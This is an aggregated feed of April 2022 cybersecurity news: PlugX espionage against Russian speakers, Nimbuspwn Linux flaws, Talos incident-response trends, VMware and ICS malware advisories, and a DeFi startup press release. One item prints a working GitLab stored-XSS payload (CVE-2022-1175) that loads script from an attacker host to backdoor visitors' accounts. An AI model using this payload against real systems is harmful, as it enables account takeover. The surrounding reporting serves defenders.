A China-linked government-sponsored threat actor has been observed targeting Russian speakers with an updated version of a remote access trojan called PlugX.
Secureworks attributed the attempted intrusions to a threat actor it tracks as Bronze President, and by the wider cybersecurity community under the monikers Mustang Panda, TA416, HoneyMyte, RedDelta, and PKPLUG.
"The war in Ukraine has

![PlugX Malware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj5xuLJaTB-qBvEp10kBoQBs184MuorHdkHDoJK2GNomCTwuAZTUlvNPt23zXOEMyNE0npV6NPejnz2nh4-Q1qMqlHh45vlNet1SwMt4uucTmdBX_fGmYICIdgwpC8qILbPYGPa0fWJ7rmDb5OpNFMyV6yR4UITUXBDc6QJVoL1SNElO54eTYL2Bbv6/s728-e1000/china-russia.gif "PlugX Malware")

A China-linked government-sponsored threat actor has been observed targeting Russian speakers with an updated version of a remote access trojan called PlugX.

Secureworks attributed the attempted intrusions to a threat actor it tracks as Bronze President, and by the wider cybersecurity community under the monikers Mustang Panda, TA416, HoneyMyte, RedDelta, and PKPLUG.

"The war in Ukraine has prompted many countries to deploy their cyber capabilities to gain insight about global events, political machinations, and motivations," the cybersecurity firm said in a report shared with The Hacker News. "This desire for situational awareness often extends to collecting intelligence from allies and 'friends.'"

Bronze President, active since at least July 2018, has a history of conducting espionage operations by leveraging custom and publicly available tools to compromise, maintain long-term access, and collect data from targets of interest.

![CyberSecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAD6AQMAAAAho+iwAAAAA1BMVEXm5+i1+56pAAAAH0lEQVQYGe3AAQ0AAADCIPuntscHAwAAAAAAAAAAIOQmFgAB/YLDRAAAAABJRU5ErkJggg==)

Chief among its tools is PlugX, a Windows backdoor that enables threat actors to execute a variety of commands on infected systems and which has been employed by several Chinese state-sponsored actors over the years.

The latest findings from Secureworks suggest an expansion of the same campaign previously detailed by Proofpoint and ESET last month, which has involved the use of a new variant of PlugX codenamed Hodur, so labeled owing to its overlaps with another version called THOR that emerged on the scene in July 2021.

![PlugX Malware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjPISpeAfa4WL5oqadRdNrgThQ-LU9yqEyGnwIy1EzaerbYW5zrl1tGgazr6QIT40wbxIKSUn7F5z7HcJbqZcj2XCvV181YArCCbgL8TxDKH4lNqC00Cv_fJSN6p4AekErsps_3ZPT5ovcC2YBf5bngyyrpHiTsPtK2_uzORzluzuZiTHubtNFST2zR/s728-e1000/data.jpg "PlugX Malware")

The attack chain commences with a malicious executable named "Blagoveshchensk - Blagoveshchensk Border Detachment.exe" that masquerades as a seemingly legitimate document with a PDF icon, which, when opened, leads to the deployment of an encrypted PlugX payload from a remote server.

"Blagoveshchensk is a Russian city close to the China border and is home to the 56th Blagoveshchenskiy Red Banner Border Guard Detachment," the researchers said. "This connection suggests that the filename was chosen to target officials or military personnel familiar with the region."

The fact that Russian officials may have been the target of the March 2022 campaign indicates that the threat actor is evolving its tactics in response to the political situation in Europe and the war in Ukraine.

![CyberSecurity](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj6zHdXd3qpCksF0nkMkrjsOzaw-cxZGPHWoTEp9y7VPIeyPBFGsmIyIX8NTkqI1IDqnIXYnsZuIh4rc9f8TNUn7ndAZqtXc-t58X2oueTaL4Ijb4hgH-b183QvQ0ienXIipuOsqeLP5b8I2prKmp0RWvdZQgnKehVRKbqRQpin1JgfwlZeE_IB4EmesQ/s1600/crowdsec-728.jpg)

"Targeting Russian-speaking users and European entities suggests that the threat actors have received updated tasking that reflects the changing intelligence collection requirements of the \[People's Republic of China\]," the researchers said.

The findings come weeks after another China-based nation-state group known as Nomad Panda (aka RedFoxtrot) was linked with medium confidence to attacks against defense and telecom sectors in South Asia by leveraging yet another version of PlugX dubbed Talisman.

"PlugX has been associated with various Chinese actors in recent years," Trellix noted last month. "This fact raises the question if the malware's code base is shared among different Chinese state-backed groups."

"On the other hand, the alleged leak of the PlugX v1 builder, as reported by Airbus in 2015, indicates that not all occurrences of PlugX are necessarily tied to Chinese actors," the cybersecurity company added.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Targeting Russian Military Personnel with Updated PlugX Malware 

Microsoft on Tuesday disclosed a set of two privilege escalation vulnerabilities in the Linux operating system that could potentially allow threat actors to carry out an array of nefarious activities.
Collectively called "Nimbuspwn," the flaws "can be chained together to gain root privileges on Linux systems, allowing attackers to deploy payloads, like a root backdoor, and perform other

![Privilege Escalation Flaws in Linux](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhG_jhh9hiswd2AzsR0aCo4MuEub8YtwWhf1ShIH_fynCfsJrWmtt2F85IXLzhTGtMEUD27Op_s2CnLgthjsCDhzTZWerBz5aaATkEYPH4sohkYbIUlb4DAGeEH1EF2H5_bIoqCvljCcU39hjYuYJuiErrVsn1WgPwMyHpOL9ZNHNy6jRL_HeTPxG_P/s728-e1000/linux-1.jpg "Privilege Escalation Flaws in Linux")

Microsoft on Tuesday disclosed a set of two privilege escalation vulnerabilities in the Linux operating system that could potentially allow threat actors to carry out an array of nefarious activities.

Collectively called "**Nimbuspwn**," the flaws "can be chained together to gain root privileges on Linux systems, allowing attackers to deploy payloads, like a root backdoor, and perform other malicious actions via arbitrary root code execution," Jonathan Bar Or of the Microsoft 365 Defender Research Team said in a report.

![CyberSecurity](https://thehackernews.com/images/-SmHk9U6ikBk/YVHUUpxrNfI/AAAAAAAA4ac/xluSCU7878ErhlmIN9mj9pKf9fr3LTBwACLcBGAsYHQ/s300-e100/rewind-3-300.png)

On top of that, the defects — tracked as **CVE-2022-29799 and CVE-2022-29800** — could also be weaponized as a vector for root access to deploy more sophisticated threats such as ransomware.

The vulnerabilities are rooted in a systemd component called networkd-dispatcher, a daemon program for the network manager system service that's designed to dispatch network status changes.

![Privilege Escalation Flaws in Linux](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhVJDKavu6WCDP6IGF4F0G_sv-BbtjlKBhwhUC_JFsQKeZqoRBzFtxfMTeE5_PGpBJOx9OQm_TcJR6mjVi5OuNx9mE1LjwbVcMg9c-xZgCFkkGOB1aMQQnVDGhXPPpKOljAJeFldyneILzyLR7BZwQVeWJZfshu44s9XBov1nLQpS0FIrdFV8KOwOhy/s728-e1000/linux.jpg "Privilege Escalation Flaws in Linux")

Specifically, they relate to a combination of directory traversal (CVE-2022-29799), symbolic link (aka symlink) race, and time-of-check to time-of-use (CVE-2022-29800) flaws, leading to a scenario where an adversary in control of a rogue D-Bus service can plant and execute malicious backdoors on the compromised endpoints.

![CyberSecurity](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj6zHdXd3qpCksF0nkMkrjsOzaw-cxZGPHWoTEp9y7VPIeyPBFGsmIyIX8NTkqI1IDqnIXYnsZuIh4rc9f8TNUn7ndAZqtXc-t58X2oueTaL4Ijb4hgH-b183QvQ0ienXIipuOsqeLP5b8I2prKmp0RWvdZQgnKehVRKbqRQpin1JgfwlZeE_IB4EmesQ/s1600/crowdsec-728.jpg)

Users of networkd-dispatcher are highly recommended to update their instances to the latest version to mitigate potential arising out of exploiting the flaws.

"The growing number of vulnerabilities on Linux environments emphasize the need for strong monitoring of the platform's operating system and its components," Bar Or said.

"This constant bombardment of attacks spanning a wide range of platforms, devices, and other domains emphasizes the need for a comprehensive and proactive vulnerability management approach that can further identify and mitigate even previously unknown exploits and issues."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Discovers New Privilege Escalation Flaws in Linux Operating System

Gitlab versions 14.9 prior to 14.9.2, 14.8 prior to 14.8.5, and 14.7 prior to 14.7.7 suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: Gitlab Stored XSS# Date: 12/04/2022# Exploit Authors: Greenwolf & stacksmashing# Vendor Homepage: https://about.gitlab.com/# Software Link: https://about.gitlab.com/install# Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2# Tested on: Linux# CVE : CVE-2022-1175# References: https://github.com/Greenwolf/CVE-2022-1175Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens leading users who visit the XSS page to silently have the accounts backdoor.Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though.<pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre>Standard script include also works depending on the sites CSP policy. This is more stealthy.<pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>

Gitlab 14.9 Cross Site Scripting

Ransomware continues as the top threat, while a novel increase in APT activity emerges




By Caitlin Huey.
Ransomware was still the top threat Cisco Talos Incident Response (CTIR) saw in active engagements this quarter, continuing a trend that started in 2020. As mentioned in the 2021...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

**Ransomware continues as the top threat, while a novel increase in APT activity emerges**

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_m4GPG0IRtDZT8UPmsyLr0gHPUOZG1xe-nqkh_-htxekZ2VwXvCDwQ8BYNRdgArcMmYzlZFnuF0jeHt6cX635yT0RoREd4bm8DmU2JUzXrdw3rsGmOB8tMP6AvQ1RHXqXJXrFF_aM73nFmVAh8Q3U1yVoIP7sM9E5QwxT2wmK99_PaSTG7iyWXvVm/s16000/TIR_quarterly_trends_banner.jpg)

_By Caitlin Huey._

Ransomware was still the top threat Cisco Talos Incident Response (CTIR) saw in active engagements this quarter, continuing a trend that started in 2020. As mentioned in the 2021 year-in-review report, CTIR continues to deal with an expanding set of ransomware adversaries and major cybersecurity incidents affecting organizations worldwide.  

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUDkQFdigkJg7M2nBf3gqfEKhHJO6U55wD02LN9awloHiV14wGiJp9DeUDcT8UHImiNQsCzeR08Omtjk6FCRRyYYrRg4ffp-oVJ793zZLouMKN3LHw8G0JAoUG_VtyM_3C-yISYFTlWoTN7Uc0DAUawRa3FyPe6Rz4XBddpnrDWdE8aSqRv3HRC_mL/w200-h48/blog-onepager-button.jpg)

The first quarter of 2022 also featured an increase in engagements involving advanced persistent threat (APT) activity. This included Iranian state-sponsored MuddyWater APT activity, China-based Mustang Panda activity leveraging USB drives to deliver the PlugX remote access trojan (RAT), and a suspected Chinese adversary dubbed “Deep Panda” exploiting Log4j. 

**Targeting**

A wide variety of verticals were targeted, including education, energy, financial services, health care, industrial production and equipment, local government, manufacturing, real estate, telecommunications and utilities. The top targeted vertical was telecommunications, following a trend where it was among the top targeted verticals in the previous quarter, closely followed by organizations in the education and government sectors. 

**Threats**

Ransomware continued to comprise the majority of threats CTIR responded to. No one ransomware family was observed twice in incidents that closed out this quarter. This is indicative of a trend toward greater democratization of ransomware adversaries that Talos began observing last year. This quarter also saw the appearance of emerging ransomware families, including Cerber (aka CerberImposter), Entropy and Cuba. There were also high-profile ransomware families, such as Hive and Conti. 

CTIR observed ransomware adversaries exfiltrating sensitive data supporting double extortion as another method to further compel victims to pay the ransom, a continuation of a trend that began in the winter of 2019. For example, in an Entropy ransomware engagement affecting a local government organization, CTIR identified traffic and activity associated with mega\[.\]nz, a utility commonly used for file transfer and data exfiltration. It was first observed executing from the following path: "C:\\Users\\admin\\AppData\\Local\\MEGAsync\\MEGAsync.exe".  

After ransomware, the next most commonly observed threat this quarter included exploitation of Log4j, the Apache logging utility commonly used by organizations globally. Adversaries have continued to exploit Log4j (CVE-2021-44228, CVE-2021-45046, and related vulnerabilities) since the security flaws were initially published in December 2021. In January 2022, CTIR started to observe a growing number of engagements in which adversaries are attempting to exploit Loj4j in vulnerable VMware Horizon servers. 

In one engagement affecting an education institution, CTIR found evidence of PowerShell scripts including a line that killed the process “ws\_TomcatService.exe”, a key parent process in commonly observed malicious Log4j activity. The combination of the timeframe and the unpatched, vulnerable state of the VMware Horizon server suggests that Log4j exploitation was a probable root cause of the compromise. The adversary also installed cryptocurrency miners; conducted reconnaissance with Bloodhound, an application used to enumerate relations within Active Directory (AD); created at least one local “DomainAdmin” account; and leveraged remote desktop protocol (RDP) for potential lateral movement. 

**Advanced persistent threats**

As mentioned above, CTIR observed a novel increase in APT activity in engagements compared to previous quarters. This includes activity associated with Iranian state-sponsored MuddyWater, China-based Mustang Panda deploying the PlugX RAT, and a suspected Chinese state-sponsored actor dubbed Deep Panda leveraging Log4j. 

For example, a health care organization was affected by threat activity associated with Deep Panda in which the adversary exploited Log4j to deploy a custom backdoor. CTIR initially observed a PowerShell command that downloaded three additional files — “1.bat”, “syn.exe” and “l.dll” — from the attacker’s server, which has been linked to the adversary by other security firms. The PowerShell script executes “1.bat,” which subsequently executes “syn.exe” and proceeds to delete all three files from the disk. The “syn.exe” file creates a service set to autorun and is launched via “svchost.exe”. The “1.dll” file is packed with Themida, which is used to detect monitoring programs that may be used for malware reversing.    

In another engagement affecting a telecommunications organization, CTIR’s research provided moderate to high confidence that several of the indicators of compromise (IOCs) and tactics, techniques and procedures (TTPs) discovered were linked to Mustang Panda. The initial compromise was determined to be due to a malware-infected USB connected to corporate resources that subsequently deployed PlugX, a RAT commonly deployed by Mustang Panda that steals credentials from compromised machines. After the USB was connected to the corporate environment for approximately one hour, a hidden directory was created within “C:\\ProgramData” containing files associated with PlugX. The variant can uniquely spread via USB, which distinguishes it from other PlugX variants. This PlugX variant creates a hidden folder named “RECYCLE.BIN” and copies three files: a benign EXE, a loader DLL and an encrypted DAT file. The malware hides all of the folders in the root directory and creates LNK files for each one in order to deceive the victim. In this instance, the malware used legitimate Avast-signed executables to sideload a malicious PlugX DLL.  

**Initial vectors**

For the majority of engagements, identifying an initial vector was difficult due to shortfalls in logging and visibility. However, in engagements in which the initial vector could be confirmed, or reasonably assumed, this quarter featured a number of engagements where adversaries exploited public-facing applications that were vulnerable to Log4j. For example, in one engagement affecting a telecommunications company, CTIR observed a large number of PowerShell download requests to an IP address associated with Log4j exploitation attempts against vulnerable VMware Horizon servers. Following this activity, high CPU usage was detected on a VMware Horizon server, leading to the identification of several clusters of cryptocurrency miners, consistent with typical cryptocurrency miner threat actor behavior following the release of high-profile vulnerabilities.

In a Cerber ransomware incident affecting a holding company, the adversary used vulnerabilities affecting GitLab (CVE-2021-22204 and CVE-2021-22205) to upload and execute code remotely, ultimately granting unauthorized access to that system in the context of the "git" account. This is consistent with reporting from other security firms on a new version of Cerber ransomware targeting Atlassian Confluence and GitLab servers with older RCE vulnerabilities. The adversary attempted to expand access through privilege escalation and lateral movement and ultimately executed ransomware.  

**Security weaknesses**

The top recommendation that responders have for organizations is to implement multi-factor authentication (MFA) on all critical services, including endpoint detection response (EDR) solutions. MFA is an effective way to prevent adversaries from gaining unwanted access, and we routinely see threat activity that could have been prevented if MFA had been enabled.  

In one engagement that kicked off this quarter affecting a telecommunications company involving pre-ransomware TTPs, the adversary compromised the organization’s help desk/call center partner company. This was identified as the root cause of the compromise due to the third party having access to the organization’s Citrix machines while not enabling MFA. CTIR recommends that all third parties in the environment are following MFA security policies and guidelines.

**Top-observed MITRE ATT&CK techniques**

Below is a list of the MITRE ATT&CK techniques observed in this quarter’s IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. The table below represents the techniques used with a relevant example, and the approximate number of times seen. However, it is not an exhaustive list.

Key findings from the MITRE ATT&CK appendix include: 

*   We observed an increase in engagements in which initial access was achieved via phishing with a malicious link or document that relied upon subsequent user execution. Compared to last quarter, we observed more threats leveraging social engineering techniques, as well as masquerading as legitimate files or utilities to entice users to click or execute a given link or file.
*   Due to the number of engagements responders supported that exploited Log4j, we observed an increase in techniques relying on exploiting unpatched and vulnerable public-facing applications. This coincides with our observations of adversaries capitalizing on organizations’ lack of up-to-date patches and improper data protections.
*   We saw a large increase in defense evasion and collection techniques compared to previous quarters. The observed collection techniques exhibited the actors’ interest in specific information, including collecting details about certain hosts that could be used for targeting, keylogging to access credentials in the browser, and selecting particular files of interest for possible exfiltration.  
*   Consistent with last quarter’s findings, we continued to see a reliance on utilities such as PsExec and Cobalt Strike and a variety of remote access software, such as TeamViewer and ScreenConnect, to facilitate remote access. 

Tactic

Technique

Example

Initial Access (TA0001)

T1190 Exploit Public-Facing Application

Attackers successfully exploited a vulnerable application that was publicly exposed to the Internet.

Reconnaissance (TA0043)

T1592 Gather Victim Host Information

Malicious file contains details about host

Persistence (TA0003)

T1053 Scheduled Task/Job

Scheduled tasks were created on a compromised server

Execution (TA0002)

T1059.001 Command and Scripting Interpreter: PowerShell

Executes PowerShell code to retrieve information about the client's Active Directory environment

Discovery (TA0007)

T1087 Account Discovery

Use a utility like ADRecon to enumerate information on users and groups

Credential Access (TA0006)

T1003.001 OS Credential Dumping: LSASS Memory

Use “lsass.exe” for stealing password hashes from memory

Privilege Escalation (TA0004)

T1574.002 Hijack Execution Flow: DLL Side-Loading

A malicious PowerShell script attempted to side-load a DLL into memory

Lateral Movement (TA0008)

T1021.001 Remote Desktop Protocol

Adversary made attempts to move laterally using Windows Remote Desktop

Defense Evasion (TA0005)

T1027 Obfuscated Files or Information

Use base64-encoded PowerShell scripts

Command and Control (TA0011)

T1219 Remote Access Software

Remote access tools found on the compromised system

Impact (TA0040)

T1486 Data Encrypted for Impact

Deploy Conti ransomware and encrypt critical systems

Exfiltration (TA0010)

T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Actor exfiltrated data to file sharing site mega\[.\]nz

Collection (TA0009)

T1114.003 Email Collection: Email Forwarding Rule

Adversary used a compromised account to create a new inbox rule to place emails in a folder

Software/Tool

S0029 PsExec

Adversary made use of PsExec for lateral movement

Quarterly Report: Incident Response trends in Q1 2022

Apostro's system will monitor all transactions to identify malicious behavior that can cause damage to DeFi protocols.

WARSAW, Poland, April 26, 2022 /PRNewswire/ -- Apostro is a recently established European startup building a risk management platform to improve the economic security of DeFi protocols. It offers a fresh approach to DeFi security by implementing proven risk management practices and tools from traditional finance.

Many DeFi projects have become victims of exploits, losing millions of USD worth of crypto every year. The first quarter of 2022 is already setting a new record with $1.3 billion stolen in illicit transactions. While the total value locked in DeFi has already surpassed $200 billion, loopholes in the infrastructure and deficiency of risk management tools allow bad actors to steal money. This stalls DeFi adoption as institutions and big players want more security assurances before considering the space as a safe portfolio diversification option.

Currently, DeFi protocols rely on audits of their smart contracts, but this practice is insufficient when dealing with economic threats. Stress testing and formal verification can simply miss a potential logic backdoor, which gives hackers a way to steal funds by exploiting economic opportunities rather than technical weaknesses.

To deal with such threats, Apostro is building a system that will analyse smart contracts' business logic and typical interactions with the protocol by an average user. It will monitor all transactions to identify malicious behaviour that can cause damage to the protocol.

Apostro can also prevent or delay an exploit by complicating its execution by setting limits on the amount of available liquidity in one block or transaction. Simultaneously, it will alert the developers of any threats to a protocol's security, allowing them to take necessary measures to mitigate the negative impact.

_'We help minimise the impact of economic attacks on DeFi systems. Technical attacks are more or less sorted out by now: there are many good auditors, and most issues are relatively easy to catch. With economic issues, however, there are no ideal solutions available yet,'_ \- states Tim Ismiliaev, founder and CTO at Apostro.

**About Apostro**

Apostro is a risk management platform designed to track, mitigate and prevent economic smart contract exploits. Headquartered in Warsaw, Apostro utilises proven risk management practices with onchain and market data analysis to enhance security of Web3 protocols.

Introducing Apostro: A Risk Management Platform for Web3 Security

Threat actor is using the flaw to deliver Core Impact backdoor on vulnerable systems, security vendor says.

An Iranian cyber espionage group that some vendors track as Rocket Kitten has begun exploiting a recently patched critical vulnerability in VMware Workspace ONE Access/Identity Manager technology to deliver the Core Impact penetration testing tool on vulnerable systems.

VMware disclosed the remote code execution vulnerability (CVE-2022-22954) on April 6, the same time it released a patch for the issue along with fixes for a total of seven other — somewhat less critical — vulnerabilities that were privately reported to the company. VMware identified the RCE vulnerability as a server-side template injection issue that could be used for remote code execution. The software vendor assigned it a severity ranking of 9.8 on a scale of 10 because the flaw, among other things, allows attackers to gain the highest privileged access in compromised environments.

Days after the flaw was disclosed, proof-of-exploit code for it became publicly available on Twitter. Shortly thereafter, threat actors reportedly began attacking the flaw to install cryptocurrency coin miners on vulnerable servers.

Among those that began exploiting the flaw on Apr. 14 and 15 were attackers who used it to gain access to vulnerable networks and launch reverse HTTPS backdoors such as Core Impact, Cobalt Strike, and Metasploit beacons, Morphisec said in a report Monday. The tactics, techniques and procedures of the attackers suggested a link to Rocket Kitten, the security vendor said.

"Many groups appear to be exploiting this vulnerability, but there are not many groups deploying stolen Core Impact implants," says Michael Gorelik, CTO and head of threat research at Morphisec. "The US customer that we saw targeted here is one that has an outreach to many US customers. Unfortunately, we can't share any more details on that currently."

Morphisec has approached Core Security to validate the existence of the watermark within the implant, he says.

The presence of the Core Impact backdoor on the targeted network, he says, is an indication that an APT group was behind it, simply because of how rarely the backdoor has been used by others.

**Ransomware Risk**  
Morphisec described the new vulnerability as a server-side template injection in an Apache Tomcat component of VMware's Workspace ONE Access/Identity Manager that allows remote commands to be executed on the hosting server. The flaw greatly heightens the risk of ransomware attacks and significant security breaches for organizations using the vulnerable technology, the security vendor said.

VMware Workspace ONE Access was previously known as VMware Identity Manager. The technology is designed to give enterprises a way to quickly implement multifactor authentication, single sign-on, and conditional access policies for workers attempting to access enterprise SaaS, mobile, and Web application environments. "It is an identity provider and manager," Gorelik says. "It has access to all the organizational users and acts as access control to the environment."

Morphisec said several vulnerabilities have been disclosed in the VMware technology recently, including two other RCE flaws, CVE-2022-22958 and CVE-2022-22957. While both of these flaws are remotely executable, the attacker would need to have gained administrative access to the vulnerable server first. However, the new flaw from earlier this month does not require attackers to have this level of access to exploit it, Morphisec said.

**PowerShell in the Mix**  
In the attack that Morphisec observed, the attacker — after gaining initial access to the vulnerable system — deployed a PowerShell stager on it that in turn downloaded a highly obfuscated PowerShell script called PowerTrash Loader. The loader then loaded a Core Impact agent in system memory without leaving a trace of forensic evidence.

Gorelik says Morphisec researchers have previously observed APT groups such as Russia's FIN7 use PowerTrash Loader to upload remote-access Trojans such as JSSLoader on target systems in other campaigns.

"The PowerShell command is executed as a direct command sent through server-side template injection," Gorelik says. "The command is an obfuscated PowerTrash downloader that eventually deployed the Core Impact backdoor."

Organizations that implement VMware's patch for the flaw should be protected against it, he says. VMware's advisory noted the flaw is being actively exploited and pointed to workarounds for mitigating the threat for organizations that are not able to immediately patch against it.

Iranian Hacking Group Among Those Exploiting Recently Disclosed VMware RCE Flaw

Spear-phishing campaign loaded with new "Goldbackdoor" malware targeted journalists with NK News, analysts found.

New analysis has attributed a spear-phishing campaign targeting journalists covering North Korea to APT37/Ricochet Chollimia, a state-backed group linked to the Democratic People's Republic of Korea (DPRK). Notably, researchers said the group is deploying a novel malware strain called Goldbackdoor, a variation of Bluelight malware previously attributed to APT37.

According to a report from researchers at Stairwell, multiple phishing emails were sent to NK News on Mar. 18 that appeared to be from the personal email address of the previously compromised former head of of the South Korean National Intelligence Service, and contained Goldbackdoor malware. NK News handed over the information to Stairwell for further investigation, the cybersecurity firm said.

"Due to the sensitive nature of journalists' work, they are often targets of surveillance and malware, intent on stealing information, ferreting out sources or even destroying evidence and scaring the reporters into not publishing stories," Erich Kron, security awareness advocate at KnowBe4, said in response to the news. "In regimes like North Korea, where news is tightly controlled by the state, articles or information that paints the leadership or government in a negative light is treated as a serious threat to national security."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

North Korean State Actors Deploying Novel Malware to Spy on Journalists

Mandiant data also shows a dramatic drop in attacker dwell time on victim networks in the Asia-Pacific region — to 21 days in 2021 from 76 days in 2020.

The length of time attackers remained undetected on a victim's network decreased for the fourth year in a row, sinking to 21 days in 2021, down from 24 days in 2020, according to a new report on incident response (IR) investigations conducted by Mandiant.

Mandiant in its IR cases found that companies have tuned their detection capabilities to find the most dangerous attacks quickly, with ransomware detected within five days on average; non-ransomware attacks remained active for 36 days in 2021, down from 45 days in 2020. But the quicker detection of ransomware attacks may not necessarily be positive, instead being due to the activation of the payload, says Steven Stone, senior director of adversary operations for Mandiant.

In general, however, the improvement is driven by faster detection of non-ransomware threats because more companies are working with third-party cybersecurity firms, and government agencies and security firms often notify victims of attacks, leading to faster detection, he says.

"We think the combination of factors like these contributes to what we already see as year-over-year improvements in these regions," Stone says. "Ultimately, initial threat vectors come down to attacker choices and the availability of different vulnerabilities. Overall, we see some attack groups use different methods concurrently, likely showing a preference per target efforts."

Companies have improved their detection times dramatically over the past decade, reducing the time to detect attackers by nearly a factor of 20, from 418 days in 2011 to 21 days in 2021, according to the Mandiant M-Trends 2022 report.

    

Source: Mandiant

The improvement in company's detection capabilities varied significantly by region, with firms in the Asia-Pacific region seeing a dramatic drop in so-called "dwell time" to 21 days in 2021, from 76 days in 2020. European companies also saw a significant decrease to 48 days, from 66 days in 2020, while North American companies' detection did not change, staying level at 17 days.

**Attackers Love Cobalt Strike**  
The most popular attack tool remained the Beacon backdoor, which accounted for 28% of all identified malware families. Beacon is a component of the Cobalt Strike penetration testing tool, which is also popular with malicious attackers. Other attack tools quickly dropped off in frequency and include the Sunburst backdoor for .NET environments, the Metasploit penetration testing platform, and SystemBC, a proxy toolkit.

Overall, two methods of initial compromise — exploiting vulnerabilities and attacks through the supply chain — accounted for 54% of all attacks with an identified initial infection vector in 2021, up from less than a 30% share of attacks in 2020, according to Mandiant. The changing tactics underscore that companies need to keep informed of attackers' techniques, Jurgen Kutscher, executive vice president for service delivery at Mandiant, said in a statement announcing the report.

"In light of the continued increased use of exploits as an initial compromise vector, organizations need to maintain focus on executing on security fundamentals — such as asset, risk, and patch management," he said. "The key to building resilience lies in preparation. Developing a robust preparedness plan and well-documented and tested recovery process can help organizations successfully navigate an attack and quickly return to normal business operations."

**Active Directory in the Bullseye**  
In another trend, attackers are increasingly taking aim at hybrid Active Directory (AD) installations, because misconfigurations in the hybrid identity model — where credentials and keys are synchronized between on-premises AD services and Azure Active Directory in the cloud — lead to compromises, Mandiant stated in the report.

Companies should treat hybrid Active Directory servers as the most sensitive level of assets, tier 0, and only allow access from privileged workstation from a segmented network. Along with monitoring, these steps should make exploitation much more difficult, says Evan Pena, managing director of Mandiant's global red team.

Luckily, implementing best security practices for hybrid AD servers is not hard to get right, he says.

"As companies move their resources to the cloud while using hybrid models, attackers will target these hybrid servers to achieve both domain and cloud compromise," he says. "It is common for these hybrid servers to have high-level privileges to on-premises servers — \[such as\] domain controllers — and cloud resources."

Companies should be tackling the primary threat this year by reviewing and assessing their Active Directory implementation for vulnerabilities or misconfigurations, understanding how to detect and prevent unusual lateral movement attempts in their environment, and implementing application whitelisting and disabling macros to significantly limit initial access attacks, says Pena.

More Than Half of Initial Infections in Cyberattacks Come Via Exploits, Supply Chain Compromises

The recent discovery of highly customized malware targeting programmable logic controllers has renewed concerns about the vulnerability of critical infrastructure.

The US Cybersecurity and Infrastructure Security Agency (CISA), along with the NSA, FBI, and others, this week urged critical infrastructure organizations — especially in the energy sector — to implement defenses against a set of highly sophisticated cyberattack tools designed to target and disrupt industrial environments.

The warning applies particularly to ICS and OT networks using programmable logic controllers (PLCs) from Schneider Electric and Omron and servers based on Open Platform Communications Unified Architecture (OPC UA). The advisory was prompted by the recent discovery of three malware tools custom-built to target these technologies and manipulate them in dangerous and potentially destructive ways. However, the malware can be adapted to attack other ICS technologies as well.

CISA's advisory contained a series of mitigation measures that it recommended organizations implement proactively to reduce exposure to the new threat.

Mandiant analyzed the new attack tools recently in partnership with Schneider and is collectively tracking them under the name INCONTROLLER. In a report this week, the security vendor described the malware as having an "exceptionally rare and dangerous" capability and posing a critical risk to organizations that use the targeted equipment. Mandiant compared INCONTROLLER to previous ICS-specific threats such as Stuxnet, which was used to destroy hundreds of centrifuges at an Iranian nuclear-enrichment facility in 2010, and Industroyer, which caused a power outage in Ukraine in 2016.

**Work of a Russian State-Sponsored Group?**  
"We believe INCONTROLLER is very likely linked to a state-sponsored group given the complexity of the malware, the expertise and resources that would be required to build it, and its limited utility in financially motivated operations," says Rob Caldwell, director of industrial control systems and operational technology at Mandiant. He says Mandiant has been unable to associate the malware with any previously tracked group but believes those behind it are most likely Russia-linked. "While our evidence connecting INCONTROLLER to Russia is largely circumstantial, we note it given Russia's history of destructive cyberattacks, its current invasion of Ukraine, and related threats against Europe and North America."

Mandiant identified one of the attack tools as "Tagrun," a tool for scanning OPC environments, enumerating OPC servers, harvesting data from them, and brute-forcing credentials. The security vendor identified the tool as likely used for conducting reconnaissance on industrial networks. Mandiant has dubbed the second tool as "Codecall," which it described as a framework that uses two common industrial protocols — Modbus and Codesys — to communicate and interact with at least three Schneider PLCs. The malware can identify Schneider and other Modbus-enabled devices on a network and connect to them using the two protocols. The third tool, "Omshell," targets Omron PLCs via HTTP, Telnet, and a proprietary Omron protocol. It is designed to interact with a mechanism on Omron devices for monitoring the safe running of so-called servo motors used in industrial applications. The malware can gain shell access to Omron PLCs and take a variety of malicious actions, including wiping device memory, resetting a device, loading backup data, and executing arbitrary code on it.

Collectively the malware tools have capabilities that allow attackers to surveil and collect data from target industrial environments that they can then use to identify high-value systems and to launch potentially catastrophic attacks against them in industrial settings. Potential attack scenarios include threat actors using Omshell and/or Codecall to crash targeted PLCs and disrupt operations; sending malicious commands to PLCs to sabotage industrial processes; or disabling safety controllers to cause physical destruction in a plant or industrial setting.

"The components of INCONTROLLER contain more sophisticated methods of interacting with and attacking or modifying the targeted devices than seen in previous ICS-specific malware," Caldwell says. These components are designed to make interaction with PLC devices easy for attackers with little detailed knowledge of the targeted ICS protocols. "Further, these components are modular and could be extended to target additional devices or add additional capabilities," he says.

